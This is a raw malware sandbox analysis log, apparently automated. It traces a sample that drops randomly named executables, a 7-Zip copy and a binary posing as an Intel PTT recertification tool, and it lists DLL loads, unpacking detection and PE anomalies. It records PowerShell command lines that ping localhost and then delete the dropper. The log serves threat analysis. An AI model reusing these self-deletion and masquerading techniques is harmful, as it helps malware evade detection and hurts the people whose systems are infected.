Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: ureg.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: file.exe

Static file information: File size 3063296 > 1048576

Source: file.exe

Static PE information: Raw size of tklukryc is bigger than: 0x100000 < 0x2ba000

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W;tklukryc:EW;ednrpsaq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tklukryc:EW;ednrpsaq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.730000.0.unpack :EW;.rsrc:W;.idata :W;tklukryc:EW;ednrpsaq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tklukryc:EW;ednrpsaq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 5.2.skotes.exe.730000.0.unpack :EW;.rsrc:W;.idata :W;tklukryc:EW;ednrpsaq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tklukryc:EW;ednrpsaq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Unpacked PE file: 6.2.e66237da20.exe.1a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vpedfbia:EW;fsmwrfhy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vpedfbia:EW;fsmwrfhy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Unpacked PE file: 35.2.53f7160658.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsrfimey:EW;mhpawist:EW;.taggant:EW; vs :ER;.rsrc:W;

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Code function: 7_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

7_2_00402665

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.5.dr	Static PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
Source: random[1].exe1.5.dr	Static PE information: real checksum: 0x1d6977 should be: 0x1cd8d4
Source: 7z.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x7b29e
Source: e66237da20.exe.5.dr	Static PE information: real checksum: 0x1d6977 should be: 0x1cd8d4
Source: random[2].exe0.5.dr	Static PE information: real checksum: 0x2dabee should be: 0x2dac41
Source: 318ea9f50d.exe.5.dr	Static PE information: real checksum: 0x1aaead should be: 0x12554
Source: 7z.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x1a2c6b
Source: Intel_PTT_EK_Recertification.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: in.exe.18.dr	Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: 53f7160658.exe.5.dr	Static PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
Source: c3fed0b086.exe.5.dr	Static PE information: real checksum: 0x2dabee should be: 0x2dac41
Source: file.exe	Static PE information: real checksum: 0x2f9839 should be: 0x2f7633
Source: random[2].exe2.5.dr	Static PE information: real checksum: 0x1aaead should be: 0x12554
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x2f9839 should be: 0x2f7633
Source: random[1].exe0.5.dr	Static PE information: real checksum: 0x43baa5 should be: 0x445300
Source: 53fe16f582.exe.5.dr	Static PE information: real checksum: 0x43baa5 should be: 0x445300
Source: random[2].exe.5.dr	Static PE information: real checksum: 0x1d83cc should be: 0x1cf91c
Source: a98b6b83c7.exe.5.dr	Static PE information: real checksum: 0x1d83cc should be: 0x1cf91c

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: tklukryc
Source: file.exe	Static PE information: section name: ednrpsaq
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: tklukryc
Source: skotes.exe.0.dr	Static PE information: section name: ednrpsaq
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.5.dr	Static PE information: section name:
Source: random[1].exe.5.dr	Static PE information: section name: .idata
Source: random[1].exe.5.dr	Static PE information: section name:
Source: random[1].exe.5.dr	Static PE information: section name: fsrfimey
Source: random[1].exe.5.dr	Static PE information: section name: mhpawist
Source: random[1].exe.5.dr	Static PE information: section name: .taggant
Source: 53f7160658.exe.5.dr	Static PE information: section name:
Source: 53f7160658.exe.5.dr	Static PE information: section name: .idata
Source: 53f7160658.exe.5.dr	Static PE information: section name:
Source: 53f7160658.exe.5.dr	Static PE information: section name: fsrfimey
Source: 53f7160658.exe.5.dr	Static PE information: section name: mhpawist
Source: 53f7160658.exe.5.dr	Static PE information: section name: .taggant
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name: .idata
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name: gmgvfxzz
Source: random[1].exe0.5.dr	Static PE information: section name: oqheswup
Source: random[1].exe0.5.dr	Static PE information: section name: .taggant
Source: 53fe16f582.exe.5.dr	Static PE information: section name:
Source: 53fe16f582.exe.5.dr	Static PE information: section name: .idata
Source: 53fe16f582.exe.5.dr	Static PE information: section name:
Source: 53fe16f582.exe.5.dr	Static PE information: section name: gmgvfxzz
Source: 53fe16f582.exe.5.dr	Static PE information: section name: oqheswup
Source: 53fe16f582.exe.5.dr	Static PE information: section name: .taggant
Source: random[2].exe.5.dr	Static PE information: section name:
Source: random[2].exe.5.dr	Static PE information: section name: .idata
Source: random[2].exe.5.dr	Static PE information: section name:
Source: random[2].exe.5.dr	Static PE information: section name: sqzmxkkd
Source: random[2].exe.5.dr	Static PE information: section name: vbjjmcvu
Source: random[2].exe.5.dr	Static PE information: section name: .taggant
Source: a98b6b83c7.exe.5.dr	Static PE information: section name:
Source: a98b6b83c7.exe.5.dr	Static PE information: section name: .idata
Source: a98b6b83c7.exe.5.dr	Static PE information: section name:
Source: a98b6b83c7.exe.5.dr	Static PE information: section name: sqzmxkkd
Source: a98b6b83c7.exe.5.dr	Static PE information: section name: vbjjmcvu
Source: a98b6b83c7.exe.5.dr	Static PE information: section name: .taggant
Source: random[2].exe0.5.dr	Static PE information: section name:
Source: random[2].exe0.5.dr	Static PE information: section name: .idata
Source: random[2].exe0.5.dr	Static PE information: section name: doyjdknv
Source: random[2].exe0.5.dr	Static PE information: section name: vjvesdaf
Source: random[2].exe0.5.dr	Static PE information: section name: .taggant
Source: random[1].exe1.5.dr	Static PE information: section name:
